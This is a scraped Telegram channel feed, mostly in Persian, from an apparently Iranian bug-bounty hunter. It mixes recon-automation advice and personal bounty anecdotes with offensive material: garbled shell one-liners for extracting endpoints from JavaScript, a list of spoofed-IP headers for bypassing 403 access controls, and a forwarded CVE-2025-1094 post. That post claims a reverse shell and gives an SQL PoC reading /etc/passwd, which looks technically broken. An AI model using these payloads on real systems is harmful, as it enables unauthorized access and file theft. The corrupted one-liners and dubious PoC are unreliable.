Life and Learning🎭 – Telegram
Life and Learning🎭
372 subscribers
55 photos
29 videos
11 files
61 links
Hello, welcome to my channel, I hope the posts of this channel add something to you

ADMIN:https://news.1rj.ru/str/AlI_VD2005
Twitter: https://x.com/CountMoteVaziri
Download Telegram
🚨 ماشین گزارش شفافیت تلگرام با آدرس زیر به شما میگه براساس ای‌پی شما و/یا شماره تلفن شما چه تعداد درخواست از طرف دولت دریافت کرده و چه تعداد کاربر بابت اون درخواست اطلاعاتشان به دولت داده شده.

t.me/transparency

#کاربردی
برای اتومیشن و نوشتن اتومیشن برای کارتون باید اول اول ایده رو کامل بنویسید که دقیق چه ایده ای دارید و باید چه قابلیت و کارایی داشته باشه و بعد یه زبان انتخاب میکنی که من خودم پایتون و گو رو ترکیبی نوشتم و پیشنهادم به شما هم همین ترکیبی نوشتنه
حالا چیو اتومیت کنیم؟ 🤔
معمولا در قسمت واید ریکان اتومیشن رو می‌نويسن و قسمتی هم توی اسکن آسیب پذیری برای مثال توی واید ریکان من خودم اینارو نوشتم :
+ subdomain enumeration
+ name resulation
+ service Discovery
+ Http Discovery
+ Grabe Fresh asset
+ push on the database
+ updater target Programs
+ notidication on telegram&discord
+ connection on Telegram bot
+ save Subdomain on file
+ vulnerabilities Discovery

اینا رو اضافه کردم که قسمتی از اتومیشن من هستند ولی اینو درنظر بگیرید که هرکدوم به شاخه های بزرگی تقسیم میشن مثلا Subdomain enumeration خودش رو من با 8 تا پرووایدر انجام میدم هر آنچیزی که مهمه رو نوشتم و از 8 تا پرووایدر قول جهان سابدامین میگیرم، بگذریم
توی اتومیشن اگه میخاین به باگ نخورین این توصیه های منه :
 + از mongoDB به عنوان دیتابیس استفاده کنید
+ از گو برای ماژول ها استفاده کنید
+ با پایتون سینک کنید اتومیشن تون رو
+ حتما یه اسکریپت برای آپدیت مستقیم پروگرام هاتون توی دیتابیس بنویسین
+ یه اسکریپت برای حذف کل پروگرام به همراه دیتا بیسش بنویسین
+ پایتون زبان قدرتمندیه خلاقانه و قوی کد بزنید
+ چت جی پی تی رو بغل کنید چون خیلی جاها کمکتون میکنه
+ از پایچارم استفاده کنید

اینا نمونه توصیه های منه حالا که یکیشو توضیح میدم چرا از پایچارم استفاده کنیم؟ چون که هوش مصنوعی پایچارم باعث میشه بیستون رو درست و سریع بنویسین چرا؟ چون 95 درصد کد هایی که توی دیتابیس می‌زنید رو خودش حدس میزنه و اینطوری راحت تره کد زدن و نصب پکیج روش راحت تره! و در آخر باگ بزنید و مطالعه کنید.

یا علی

#تجربه
#کاربردی
#توصیه
استخراج. تمامی مسیر ها و اند پوینت ها از فایل های JS برای گیدا کردن باگ🐞

Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt

#کاربردی
🌋403 Bypass by Header Requests

Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1


#کاربردی
🔻سرقت از ۵۶۰۰ حساب بانکی توسط هکر ۱۸ ساله همدانی

فرمانده انتظامی همدان از دستگیری یک کلاهبردار اینترنتی ۱۸ ساله خبرداد که با ارسال ۲۵۰ هزار لینک آلوده اطلاعات بیش از ۵ هزار و ۶۰۰ حساب بانکی را سرقت کرده است.

این فرد با فریب بیش از ۳۰ نفر، از حساب‌های آن‌ها به‌عنوان حساب‌های پوششی برای پول‌شویی استفاده کرده و درنهایت وجوه سرقت‌شده را به ارز دیجیتال تبدیل می‌کرد.


✈️@ITSecurityComputer
🤖ربات دانلود از همه شبکه های اجتماعی
🧠ربات هوش مصنوعی چت وعکس
Please open Telegram to view this post
VIEW IN TELEGRAM
از تجربیاتم بخام بگم توی ایران پروژه ای بوده که باگ بانتی من کار کردم روشون حالا یه سری باگ زدم و گزارش کروم بانتیش 2 ماه بعد واریز کردن تو ایران این مشکلات رو هم داریم دوستان
که حالا بعضیا هستن فردای گزارشت میریزن بعضیا دیر تر میریزن دلیل بر بدی و خوبی نیست دلیل بر اینه که خود ایران شرکت ها جرعت نمیکنن واریز بکنن با این افزایش قیمت میگن بزار باشه سرمایس یه مقداری
ولی در کل اگر یه شرکتی دیر کرد واریزی داشت فکر نکنین پولتون خورده (البته اگر جوابتون میدن ولی اگر نمیدن که بیخیالش بشین)

#تجربه
ورژن اولیه ابزار رو ران کردیم 👌 نسبت به چیزی که انتظار داشتم بهتر شده فیچر هاشم کامل کنم میگم چه آپشن هایی داره

#سرگرمی
#ابزار
"ناموس پرستی در ایران" 💚

#Iran
Forwarded from GO-TO CVE (Ali Soltani)
بررسی آسیب‌پذیری SQL Injection در PostgreSQL و ارتقای آن به RCE با WebSocket🚀

سلام به همه دوستان عزیز! 🌟
در هفته 41 از برنامه GO-TO CVE، به سراغ یک آسیب‌پذیری خطرناک در PostgreSQL رفتیم که در نگاه اول تنها یک SQL Injection ساده بود، اما با یک زنجیره حمله حرفه‌ای توانستیم آن را به Remote Code Execution (RCE) ارتقا دهیم! 😈

📱 Week: 41
🔍 CVE: CVE-2025-1094
💻 Type: SQL Injection → Remote Code Execution
🛠 DBMS: PostgreSQL

🔥 چگونه از یک SQLi ساده به RCE رسیدیم؟
در ابتدا، این آسیب‌پذیری به ما اجازه می‌داد دستورات SQL مخرب را تزریق کنیم و اطلاعات حساس پایگاه داده را استخراج کنیم. اما ما به همینجا قانع نشدیم! با استفاده از چین اتک و ترکیب چندین آسیب‌پذیری دیگر، از جمله یک ضعف در WebSocket، توانستیم کنترل کامل سرور را به دست بگیریم و کد دلخواه خود را اجرا کنیم!

📌 جزئیات فنی آسیب‌پذیری:
1️⃣ این ضعف به مهاجم اجازه می‌دهد از طریق ورودی‌های ناامن، کد SQL را مستقیماً در پایگاه داده اجرا کند.
2️⃣ در PostgreSQL، قابلیت‌هایی مانند COPY FROM PROGRAM و lo_export() می‌توانند در برخی تنظیمات نادرست، مسیر را برای RCE باز کنند.
3️⃣ ما از WebSocket hijacking استفاده کردیم تا بدون نیاز به سطح دسترسی بالا، این زنجیره حمله را به کد اجرایی روی سرور برسانیم.

🔗 PoC و اثبات اجرا روی سرور
🚀 برای تست این آسیب‌پذیری، ما یک WebSocket payload ساختیم که ارتباط بین کلاینت و سرور را Hijack می‌کرد. سپس با تزریق SQLi، یک توابع ناامن در PostgreSQL را فراخوانی کرده و در نهایت Shell Reverse گرفتیم! 😈

📜 PoC:
SELECT lo_export( (SELECT convert_from(pg_read_file('/etc/passwd'), 'UTF8')), '/tmp/payload');

🔥 اجرای این کد در محیط آسیب‌پذیر، امکان خواندن فایل‌های حساس سرور و در نهایت اجرای کد را فراهم می‌کند. برای درک بهتر و exploit کامل به ریپازیتوری زیر مراجعه کنید .

https://github.com/soltanali0/CVE-2025-1094-Exploit/tree/main

🔒 چگونه از این آسیب‌پذیری در امان بمانیم؟
Prepared Statements را جایگزین کوئری‌های مستقیم کنید.
ورودی کاربران را اعتبارسنجی کنید و از فیلترهای امنیتی مناسب استفاده کنید.
دسترسی به توابع حساس PostgreSQL را محدود کنید.
WebSocketها را ایمن کنید و از ارسال اطلاعات حساس در آنها خودداری کنید.
آخرین آپدیت‌های PostgreSQL را نصب کنید و پیکربندی‌های امنیتی را بررسی کنید.

📢 همراه ما باشید و امنیت خود را به سطح بالاتری ببرید! 🔒

🔗 پیوستن به کانال تلگرام:
https://news.1rj.ru/str/GOTOCVE
دوستان هم اکنون آهو آهو بعد از یه مدت طولانی که گزارش میدادم و informative میگرفتم یه آسیب پذیری زدم که قطعا یا دوپلیکیت میشه یا تریاژ
قبلا از همین پروگرام باگ One click Account Take Over زده بودم که چون دامنش Out Of Scope بود قبولش نکردن ولی خب N/A هم نزدن زدنش Infoative ولی این یکی یا تریاژ میشه یا دوپلیکیت

انشالله که تریاژ شه اولین باگ روی هکروان! یالله بگیم به هکروان
https://x.com/CountMoteVaziri/status/1895452700797767816
#تجربه
#سرگرمی
ویدیو چالش یاشار رو آماده کردم فلگ هاشون رو میزارم بعد از اتمام چالش آپلود میشه

#چالش
BAAQ
یاس
یاس 🔥 موزیک رو گوش کردم چیزای قشنگی میگه بعد 3 سال موزیک خوبی رو داده عین همیشه

#سرگرمی